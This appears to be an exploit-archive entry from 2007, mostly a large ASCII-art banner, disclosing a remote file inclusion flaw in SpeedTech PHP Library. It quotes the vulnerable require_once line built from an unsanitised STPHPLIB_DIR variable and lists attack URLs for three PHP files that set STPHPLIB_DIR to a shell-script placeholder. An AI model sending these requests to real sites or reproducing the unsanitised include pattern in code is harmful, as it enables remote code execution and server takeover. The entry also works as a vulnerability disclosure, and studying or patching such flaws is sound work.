STPHPLibrary (STPHPLIB_DIR) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : STPHPLibrary (STPHPLIB_DIR) Remote File Inclusion Vulnerability
# Published : 2007-09-03
# Author : leetsecurity
# Previous Title : eNetman v.20050830 (index.php page) Remote File Inclusion Vulnerability
# Next Title : Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities

?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________

# SpeedTech PHP Library  <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
##############################################################################################
#ERROR1:stphpapplication.php
#require_once("$STPHPLIB_DIR/stphpobject.php");<<< rfi coded.
#
#Other Files:
#   stphpapplication.php?STPHPLIB_DIR=[[Sh3LLScript]]
#   stphpbtnimage.php?STPHPLIB_DIR=[[Sh3LLScript]]
#   stphpform.php?STPHPLIB_DIR=[[Sh3LLScript]]
#   ........................................
#   ........................................
#   ........................................
##############################################################################################
#
#http://php.html.it/script/vedi/1872/stphplibrary/
#
##############################################################################################
#
#LEETSECURITY.ORG <<<< sanal alemde bizde varyz...
############################################################################################
#coded by ..Wocker..
#
#####special thanx:###..Str0ke..####..KEZZAP66345..####..Wocker..#############################
##############################################################################################
##############################################################################################

# www.Syue.com [2007-09-03]